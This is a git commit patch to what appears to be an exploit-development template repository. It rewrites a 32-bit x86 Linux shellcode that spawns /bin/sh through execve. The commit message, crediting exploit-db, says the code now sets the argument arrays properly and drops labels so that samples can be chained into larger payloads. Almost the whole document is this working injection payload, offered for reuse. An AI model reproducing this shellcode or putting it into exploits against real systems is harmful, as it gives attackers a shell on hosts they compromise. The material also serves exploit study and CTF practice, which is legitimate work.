From f21e743212f02dbfb560fa74d983a7e156722d11 Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sun, 15 Jan 2023 08:06:42 -0500
Subject: shellcode: Update /bin/sh shellcodes

The shell-spawning shellcodes are rewritten to address the following
concerns:

    - The array parameters to execve are now set properly, to valid
      arrays on the stack, instead of NULL pointers.

    - The cdq instruction is no longer used to sign-extend the rax
      register, since it has not been producing the expected results in
      gdb.

    - Labels, sections, and other file metadata are removed in order to
      support concatenation of shellcode samples to make more complex
      code.

Signed-off-by: Malfurious <m@lfurio.us>
---
 templates/shellcode/examples/shell32.asm | 29 +++++++++++++++--------------
 1 file changed, 15 insertions(+), 14 deletions(-)

(limited to 'templates/shellcode/examples/shell32.asm')

diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm
index 5ff2e12..6238469 100644
--- a/templates/shellcode/examples/shell32.asm
+++ b/templates/shellcode/examples/shell32.asm
@@ -1,15 +1,16 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/46809
+; See shell64.asm for more details.
 
-; https://www.exploit-db.com/shellcodes/46809
-
-_start:
-    xor     ecx, ecx
-    xor     edx, edx
-    push    0xb
-    pop     eax
-    push    ecx
-    push    0x68732f2f
-    push    0x6e69622f
-    mov     ebx, esp
-    int     0x80
+; execve("/bin/sh", ["/bin/sh"], [])
+xor     eax, eax
+xor     ecx, ecx
+push    ecx
+push    0x68732f2f
+push    0x6e69622f
+mov     ebx, esp
+push    ecx
+mov     edx, esp
+push    ebx
+mov     ecx, esp
+mov      al, 11
+int     0x80
-- 
cgit v1.2.3